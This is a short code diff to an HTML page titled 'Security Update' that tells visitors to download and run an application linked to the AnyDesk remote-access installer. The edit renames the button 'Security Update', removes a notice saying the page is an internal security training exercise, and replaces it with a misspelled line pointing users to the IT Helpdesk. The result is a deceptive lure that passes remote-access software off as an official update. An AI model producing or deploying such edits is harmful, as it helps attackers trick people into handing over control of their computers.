--- a/index.html
+++ b/index.html
@@ -50,8 +50,8 @@
     <div class="container">
         <h1>Security Update</h1>
         <p>To proceed with the security update, please download and run the application below:</p>
-        <a href="https://anydesk.com/download" class="btn">Download Anydesk</a>
-        <p class="notice">Note: This is part of an internal security training exercise. Please contact [Your Name/Team] for further instructions.</p>
+        <a href="https://anydesk.com/download" class="btn">Security Update</a>
+        <p class="notice">Note: If you have any quewstions, please contact IT Helpdaesk for further instructions.</p>
     </div>
 </body>
 </html>
